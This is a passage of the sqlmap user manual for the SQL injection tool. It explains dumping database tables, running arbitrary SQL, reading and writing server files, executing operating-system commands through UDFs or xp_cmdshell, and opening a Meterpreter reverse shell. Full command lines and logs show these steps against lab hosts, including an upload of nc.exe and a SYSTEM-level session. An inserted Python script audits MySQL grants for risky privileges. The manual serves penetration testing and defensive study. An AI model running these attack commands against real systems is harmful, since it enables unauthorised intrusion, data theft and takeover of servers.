| cid      | int(11)  |
| hostname | text     |
| ip       | text     |
| referer  | text     |
+----------+----------+

Database: testdb
Table: users
[3 columns]
+---------+---------------+
| Column  | Type          |
+---------+---------------+
| id      | int(11)       |
| name    | varchar(500)  |
| surname | varchar(1000) |
+---------+---------------+
[...]

Retrieve the number of entries in a table

Switch: --count

You can use this switch if you want to know the number of entries in the table before exporting the required table data.

Example for Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

Export data table entries

Switch and options: --dump, -C, -T, -D, --start, --stop, --first, --last, --pivot-column and --where

If the current session user has read permission on a specific data table, you can export data table entries.

This feature depends on option -T to specify the table name and option -D to specify the database name. If a table name is given without a database name, the current database is used.

Example for Firebird target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"\
 --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+

This switch can also be used to export all entries of all tables in a given database: provide the switch --dump together with option -D only (no -T and -C).

You can also give option -C a comma-separated list of the specific column names to export.

sqlmap also writes the exported data of each table to a CSV text file. The absolute path of the file created is shown when the verbosity level is 1 or higher.

If you only want to export a range of entries, use options --start and/or --stop to say at which entry to start and at which to stop. For example, to export only the first entry provide --stop 1; to export only the second and third entries provide --start 1 --stop 3.

You can also use options --first and --last to export a single character or a range of characters of each entry. For example, to export the third to fifth characters provide --first 3 --last 5. This only makes sense with blind injection techniques, because with error-based and UNION query injection the number of requests is the same regardless of the length of the column entry.

In some cases (for example Microsoft SQL Server, Sybase and SAP MaxDB) there is no equivalent of OFFSET m, n, so table entries cannot be dumped directly. sqlmap then determines the most suitable pivot column (a column with unique values, usually the primary key) and uses it to retrieve the values of the other columns. If the automatically chosen pivot column is not suitable (for example, if the dump is missing results) and you need to force a specific column, use option --pivot-column (for example --pivot-column=id).

If you want to restrict the dump to specific column values (or ranges), use option --where. The logical expression given is used inside the WHERE clause of the queries. For example, with --where="id>3" only rows whose id is greater than 3 are retrieved (by appending WHERE id>3 to the queries used).

As you may have noticed, sqlmap is flexible: you can let it dump whole database tables automatically, or be very precise and dump specific characters, columns and ranges of entries.

Export all data table entries

Switches: --dump-all and --exclude-sysdbs

If the read privileges of the current session user allow it, you can export all database table entries at once.

You can also provide the switch --exclude-sysdbs to skip all system databases; sqlmap then exports only the entries of user database tables.

Note that for Microsoft SQL Server, the master database is not considered a system database because some database administrators use it as a user database.

Search columns, tables, or databases

Switch and options: --search, -C, -T, -D

This switch allows you to search for specific database names and table names in all databases and specific column names in specific data tables.

This is useful, for example, to identify a table that contains application credentials, where the names of the relevant columns contain strings such as name and pass.

The switch --search needs to be used together with one of the following support options:

  • -C. Search the entire DBMS with a comma separated list of column names.
  • -T. Search the entire DBMS with a comma separated list of table names.
  • -D. Search the entire DBMS with a comma separated list of database names.

Run custom SQL statements

Option and switch: --sql-query and --sql-shell

The SQL query and SQL shell features allow arbitrary SQL statements to be run on the DBMS. sqlmap parses the statement provided, determines which technique is suitable to inject it and how to wrap it in the corresponding SQL payload.

If the query is a SELECT statement, sqlmap retrieves its output. Otherwise, if the web application's back-end DBMS supports multiple statements, the query is executed through the stacked queries injection technique. Note that some web application technologies do not support stacked queries on a particular DBMS: for example, PHP does not support stacked queries when the back-end DBMS is MySQL, but it does when the back-end DBMS is PostgreSQL.

Example for Microsoft SQL Server 2000 target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo'" -v 1

[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':    'foo'

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo','bar'" -v 2

[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now 
unpack it into distinct queries to be able to retrieve the output even if we are
 going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS 
VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA
RCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
SELECT 'foo', 'bar':    'foo, bar'

As you can see, sqlmap decomposes the provided query into two different SELECT statements, and then obtains the output of each query separately.

If the query provided is a SELECT statement and contains a FROM clause, sqlmap asks you whether the statement can return multiple entries. In that case it knows how to unpack the query correctly, count the number of entries and retrieve the output entry by entry.

The --sql-shell option lets you run your own SQL statements interactively, as if you were connected directly to the SQL console of the DBMS. It also provides TAB completion and command history.

Brute force

The following switches can be used to run brute-force checks.

Brute-force table names

Switch: --common-tables

In some scenarios the switch --tables cannot be used to retrieve the names of the tables in the database. These scenarios usually are:

  • The DBMS is MySQL < 5.0, which has no information_schema.
  • The DBMS is Microsoft Access, where the system table MSysObjects is not readable by default.
  • The current session user has no read privilege on the system table that stores the DBMS table definitions.

If one of the first two scenarios applies and you have provided the switch --tables, sqlmap prompts you whether to fall back to the brute-force technique. Even in those scenarios, if you provide --common-tables, sqlmap can still identify some existing tables: it brute-forces the existence of common table names across the DBMS.

The list of common table names is stored in txt/common-tables.txt and can be edited freely.

Example for MySQL 4.1 target:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --commo\
n-tables -D testdb --banner

[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.21-community-nt'

[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/tx
t/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users

Database: testdb
[1 table]
+-------+
| users |
+-------+

Brute-force column names

Switch: --common-columns

For any table, there are cases where the switch --columns cannot be used to retrieve the column names of the table. These cases usually are:

  • The DBMS is MySQL < 5.0, which has no information_schema.
  • The DBMS is Microsoft Access, whose system tables do not store column name information.
  • The current session user has no read privilege on the system table that stores the DBMS table definitions.

If one of the first two scenarios applies and you have provided the switch --columns, sqlmap prompts you whether to fall back to the brute-force technique. Even in those scenarios, if you provide --common-columns, sqlmap can still identify some existing columns: it brute-forces the existence of common column names across the DBMS.

The list of common column names is stored in txt/common-columns.txt and can be edited freely.

User-defined function injection

The following options are used to create user-defined functions.

Inject user-defined functions (UDF)

Switch and option: --udf-inject and --shared-lib

You can inject your own user-defined functions (UDFs) by compiling a MySQL or PostgreSQL shared library (a DLL on Windows, a shared object on Linux/Unix) and then providing sqlmap with the path to the shared library on your local file system. sqlmap then asks you some questions, uploads the shared library to the database server file system, creates the user-defined functions from it and, depending on your choices, executes them. When you have finished using the injected UDFs, sqlmap can also remove them from the database.

These techniques are described in detail in the white paper Advanced SQL injection to operating system full control.

Use the option --udf-inject and follow the instructions.

If needed, you can also specify the local file system path of the shared library from the command line with the --shared-lib option. Otherwise sqlmap asks for the path at run time.

This feature is only available when the DBMS is MySQL or PostgreSQL.
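UDF injection, and the file-system and operating-system features in the sections that follow, only work when the web application's database account holds privileges it does not need for its job. As an added example (not sqlmap's own code), the following Python audits the output of MySQL SHOW GRANTS for exactly those privileges; the accounts and grant statements are constructed sample data.

```python
import re

# Constructed SHOW GRANTS output for two MySQL accounts (sample data, not from the page).
SAMPLE_GRANTS = {
    "'webapp'@'localhost'": [
        "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
        "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'webapp'@'localhost'",
    ],
    "'legacy_app'@'%'": [
        "GRANT SELECT, FILE, SUPER ON *.* TO 'legacy_app'@'%'",
        "GRANT INSERT ON `mysql`.* TO 'legacy_app'@'%'",
        "GRANT ALL PRIVILEGES ON `legacy`.* TO 'legacy_app'@'%' WITH GRANT OPTION",
    ],
}

# One statement as printed by SHOW GRANTS: GRANT <privs> ON <scope> TO <account> [WITH GRANT OPTION]
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<account>\S+)"
    r"(?P<opts>\s+WITH\s+GRANT\s+OPTION)?\s*$",
    re.IGNORECASE,
)

# Global privileges that let an injection reach beyond the application's own data.
RISKY_GLOBAL = {
    "ALL PRIVILEGES": "full control of the server, including everything below",
    "FILE": "LOAD_FILE() and SELECT ... INTO OUTFILE: server file read/write and web backdoor drops",
    "SUPER": "server administration; together with FILE it allows loading UDF shared libraries",
    "PROCESS": "SHOW PROCESSLIST exposes other sessions' queries",
}
# Write privileges that, on the mysql schema, allow registering UDFs through mysql.func.
WRITE_PRIVS = {"ALL PRIVILEGES", "INSERT", "UPDATE", "DELETE", "CREATE", "DROP", "ALTER"}


def parse_grant(statement):
    """Split one GRANT statement into privilege list, database scope, account and grant option.

    Only the table-level GRANT form is handled; role and PROXY grants raise ValueError.
    """
    m = GRANT_RE.match(statement.strip().rstrip(";"))
    if not m:
        raise ValueError("not a GRANT statement: %r" % statement)
    # Drop column lists such as SELECT (id, name) before splitting on commas.
    privs = [p.strip().upper() for p in re.sub(r"\([^)]*\)", "", m["privs"]).split(",")]
    db = m["scope"].split(".")[0].strip("`")  # '*' for global (ON *.*) grants
    return {"privs": privs, "db": db, "account": m["account"], "grant_option": bool(m["opts"])}


def audit(grants_by_account):
    """Return, per account, the findings that violate least privilege for a web application user."""
    report = {}
    for account, statements in grants_by_account.items():
        findings = []
        for statement in statements:
            g = parse_grant(statement)
            if g["db"] == "*":
                for p in g["privs"]:
                    if p in RISKY_GLOBAL:
                        findings.append("global %s: %s" % (p, RISKY_GLOBAL[p]))
            elif g["db"].lower() == "mysql" and WRITE_PRIVS & set(g["privs"]):
                findings.append("write access to the mysql system schema: UDFs can be registered via mysql.func")
            elif "ALL PRIVILEGES" in g["privs"]:
                findings.append("ALL PRIVILEGES on %s: grant only the statements the application uses" % g["db"])
            if g["grant_option"]:
                findings.append("WITH GRANT OPTION: the account can pass its privileges to other accounts")
        report[account] = findings
    return report


if __name__ == "__main__":
    for account, findings in audit(SAMPLE_GRANTS).items():
        print(account, "OK" if not findings else "")
        for finding in findings:
            print("  -", finding)
```

An account that passes with no findings can still be abused for data access within its own schema; the audit only covers the privileges that turn an injection into file-system or operating-system access.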

Access file system

Read database server file system files

Option: --file-read

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the privileges needed to abuse database-specific functions and architectural weaknesses, sqlmap can read the contents of files from the underlying file system. The file can be text or binary; sqlmap handles both correctly.

Details of these techniques can be found in the white paper Advanced SQL injection to operating system full control.

The following is an example of obtaining binary files with Microsoft SQL Server 2005 as the target:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?nam\
e=luther" --file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/
C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe 
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C_
_example.exe

$ file output/192.168.136.129/files/C__example.exe 
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI
) Intel 80386 32-bit

Upload files to the file system of the database server

Options: --file-write and --file-dest

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the privileges needed to abuse database-specific functions and architectural weaknesses, sqlmap can upload a local file to the database server file system. The file can be text or binary; sqlmap handles both correctly.

Details of these techniques can be found in the white paper Advanced SQL injection to operating system full control.

The following is an example of submitting a UPX compressed binary file to the server with MySQL as the target:

$ file /software/nc.exe.packed 
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32
-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -\
-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0

[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
fully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
ytes, same size as the local file '/software/nc.exe.packed'

Take over the operating system

Run any operating system command

Option and switch: --os-cmd and --os-shell

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the privileges needed to abuse database-specific functions and architectural weaknesses, sqlmap can run arbitrary commands on the operating system of the database server.

On MySQL and PostgreSQL, sqlmap uploads (through the file upload feature described above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), creates the two corresponding functions in the database and calls them to execute the given command, letting the user choose whether to print the command's output. On Microsoft SQL Server, sqlmap uses the xp_cmdshell stored procedure: if it is disabled (the default on Microsoft SQL Server 2005 and above), sqlmap re-enables it; if it has been removed, sqlmap recreates it.

When the user asks for the command's standard output, sqlmap uses any available SQL injection technique (blind, in-band or error-based) to retrieve it. Conversely, when standard output is not needed, sqlmap uses the stacked queries technique to execute the command.

Details of these techniques can be found in the white paper Advanced SQL injection to operating system full control.

Example for PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
os-cmd id -v 1

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(post
gres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file sys
tem can only be deleted manually

sqlmap also supports an emulated shell in which you can type any command to execute. The corresponding switch is --os-shell and, like --sql-shell, it offers TAB completion and command history.

When stacked queries are not supported by the web application (for example PHP or ASP with a MySQL back-end) but the DBMS is MySQL, and the DBMS and the web server are on the same host, it is still possible to use SELECT ... INTO OUTFILE to write a web backdoor to a writable directory under the web server document root and so execute commands. sqlmap supports this technique and lets the user provide a comma-separated list of possible document roots so that it can try to upload the web file stager and, through it, the web backdoor. sqlmap has web file stagers and backdoors for the following languages:

  • ASP
  • ASP.NET
  • JSP
  • PHP

Out-of-band stateful connection: Meterpreter & friends

Switches and options: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the privileges needed to abuse database-specific functions and architectural weaknesses, sqlmap can establish an out-of-band stateful TCP connection between the attacker machine and the database server. Depending on the user's choice, this connection can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session.

sqlmap relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server. These techniques are:

  • Execution of the Metasploit shellcode in the database memory through sqlmap's own user-defined function sys_bineval(). Supported on MySQL and PostgreSQL, enabled with switch --os-pwn.
  • Upload and execution of a Metasploit stand-alone payload stager through sqlmap's own user-defined function sys_exec() on MySQL and PostgreSQL, or through the xp_cmdshell() stored procedure on Microsoft SQL Server. Enabled with switch --os-pwn.
  • Execution of the Metasploit shellcode by performing an SMB reflection attack (MS08-068) with a UNC path request from the database server to the attacker machine, where Metasploit's smb_relay server is listening. Supported when sqlmap runs with high privileges (uid=0) on Linux/Unix and the target DBMS runs as a Windows administrator, enabled with switch --os-smbrelay.
  • Execution of the Metasploit shellcode in the database memory by exploiting the heap-based buffer overflow in the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004). sqlmap has its own exploit to trigger the vulnerability, with automatic DEP memory protection bypass, but relies on Metasploit to generate the shellcode that is executed on successful exploitation. Enabled with switch --os-bof.

Details of these techniques can be found in the white paper Advanced SQL injection to operating system full control and in the slides Expanding the control over the operating system from the database.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?\
id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
> 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on 
all ports 
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, p
lease wait..

                                _
                                | |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                        /|
                        \|


    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
    =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_b
ineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) a
t Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0


meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit

By default, MySQL runs as SYSTEM on Windows, while PostgreSQL runs as a low privilege user postgres on Windows and Linux. Microsoft SQL Server 2000 runs as SYSTEM by default, while Microsoft SQL 2005 and 2008 run as NETWORK SERVICE in most cases and LOCAL SERVICE in some cases.

With the --priv-esc switch, sqlmap can escalate the privileges of the database process user through Metasploit's getsystem command, which uses several techniques including kitrap0d (MS10-015).

Access the Windows registry

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the web application supports stacked queries, sqlmap can access the Windows registry. In addition, the session user must have the necessary privileges.

Read Windows registry key

Switch: --reg-read

Use this switch to read registry keys.

Write Windows registry key

Switch: --reg-add

Use this switch to write registry keys.

Delete Windows registry key

Switch: --reg-del

Use this switch to delete a registry key.

Auxiliary registry options

Options: --reg-key, --reg-value, --reg-data and --reg-type

These options are used to provide the data needed to run the switches --reg-read, --reg-add and --reg-del properly, so that you can pass the registry key information as command-line arguments instead of being asked for it during execution.

Use option --reg-key to specify the Windows registry key path, --reg-value for the value name inside the key, --reg-data for the value data and --reg-type for the type of the value.

An example command line for adding a registry key hive is as follows:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --r\
eg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-ty\
pe=REG_SZ --reg-data=1

General options

The following options are used to set the general parameters of sqlmap.

Read session from a stored (.sqlite) file

Options: -s

sqlmap automatically creates a persistent session SQLite file for each target in a dedicated output directory, storing all the data needed to resume the session. Use this option if you need to set a specific location for the session file (for example, to store the session data of all targets in the same place).

Log HTTP(s) traffic to a text file

Options: -t

This option takes a text file path as its argument; sqlmap writes all generated HTTP(s) traffic to that file, including HTTP(s) requests and HTTP(s) responses.

This option is mainly useful for debugging: attach this file when submitting a potential bug report to the developers.

Run in non-interactive mode

Switch: --batch

When sqlmap must run in batch mode without any user intervention, use the --batch switch. Whenever sqlmap would ask for user input, it then proceeds with the default answer.

Binary content retrieval

Options: --binary-fields

To ease the retrieval of table fields that store binary values (for example, a password column holding the binary form of a password hash), the --binary-fields option can be used for additional proper handling of those columns. All such fields (i.e. table columns) are retrieved and displayed in hexadecimal format, so that they can be processed further by other tools (e.g. john).

Custom SQL (blind) injection character set

Options: --charset

In boolean-based blind and time-based blind injection, the user can force a custom character set to speed up data retrieval. For example, when dumping message digest values (e.g. SHA1), using --charset="0123456789abcdef" reduces the expected number of requests by about 30% compared with a normal run.

Crawl the site from the target URL

Options: --crawl

sqlmap can collect (crawl) potentially vulnerable links starting from a given target site. Use this option to set the crawling depth (the distance from the starting location); sqlmap crawls up to that depth and no further.

Running example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

Options: --crawl-exclude

Use this option to exclude pages from crawling by regular expression. For example, to skip all links containing the keyword logout, use --crawl-exclude=logout.

Specify the delimiter for CSV output

Options: --csv-del

When exporting data to a CSV file (--dump-format=CSV), entries must be separated by a "delimiter" (the default is ,). Use this option if you want to override the default delimiter (for example: --csv-del=";").

DBMS authentication credentials

Options: --dbms-cred

In some cases an operation fails because of insufficient privileges of the current DBMS user. If the user supplies admin user credentials through this option, sqlmap retries the operation with those credentials, using a "run as" mechanism of the DBMS (for example, OPENROWSET on Microsoft SQL Server).

Format of exported data

Options: --dump-format

When dumping table data to files in the output directory, sqlmap supports three output formats: CSV, HTML and SQLITE. The default is CSV, where each table row is stored as one line of a text file with , (or the symbol given by --csv-del) as the separator. With HTML, the output is stored as an HTML file in which each table row becomes a row of an HTML table. With SQLITE, the data is stored in a SQLite database, and the original table is recreated as a SQLite table with the same name.

Force specified retrieval data encoding

Options: --encoding

To decode character data properly, sqlmap uses the information provided by the web server (for example, the HTTP response header Content-Type) or derives the encoding with the third-party library chardet.

Sometimes, however, the encoding must be specified explicitly, especially when the retrieved data contains international non-ASCII characters (for example: --encoding=GBK). Note that if the data stored in the target database is incompatible with the encoding used by the database connector, the encoding information is irreversibly lost.

Estimated completion time

Switch: --eta

sqlmap can calculate and display in real time the estimated time needed to retrieve each query output. This is shown whenever the technique in use is one of the blind SQL injection types.

Examples of Boolean blind injection for Oracle targets:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id\
=1" -b --eta

[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19

Then:

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2
.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

As can be seen from the above, sqlmap will first calculate the length of the query result, then estimate the completion time, and display the percentage of completion and the number of characters received.

Empty session file

Options: --flush-session

As described above, the session file stores the data of previous runs. You can empty the contents of the session file with the --flush-session option, thereby bypassing sqlmap's default caching mechanism. Alternatively, you can remove the relevant session file manually.

Parse and test form input fields

Switch: --forms

Suppose you need to test a search box for SQL injection, or a login page (usually username and password input boxes). You can either pass a request file (-r) to sqlmap and set the submitted data (--data) yourself, or let sqlmap handle this automatically.

This switch covers both of these examples, as well as any other <form> and <input> tags appearing in HTML response bodies.

Use the --forms switch together with the target URL (-u) of the page containing the form. sqlmap requests the target URL for you, parses the forms it finds, and guides you through the SQL injection test of the form input fields (parameters) instead of the provided target URL itself.

Ignore query results in session file

Switch: --fresh-queries

As described above, the session file caches query results between runs. The --fresh-queries switch ignores the query results stored in the session file; the session file of a given run is left untouched, while previously stored query results are neither resumed nor restored.

Get data using DBMS hex function

Switch: --hex

Retrieving non-ASCII data often needs special handling. One solution is to use the DBMS hex function(s). When this switch is enabled, data is hex-encoded before retrieval and decoded back to its original form afterwards.

Examples for PostgreSQL targets:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --b\
anner --hex -v 3 --parse-errors

[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)
))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(
CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'
>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type num
eric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d
676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c20284465626961
6e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.p
hp</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by 
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]

Specify the output directory path

Options: --output-dir

By default, sqlmap stores session and result files in a subdirectory named output. To use a different location, use this option (for example: --output-dir=/tmp).

Parsing DBMS error information from the response page

Switch: --parse-errors

If the web application is configured in debug mode, the back-end DBMS error messages are displayed in the HTTP response, and sqlmap parses and displays them.

This feature is very useful for debugging. For example, it helps to understand why a specific enumeration or takeover switch fails; the cause may be a permission problem of the session user, in which case you see a DBMS error message such as access denied for user <session user>.

Examples for Microsoft SQL Server targets:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --parse-errors
[...]
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the 
timeneeded to find the right number of query columns. Automatically extending th
e rangefor current UNION query injection technique test
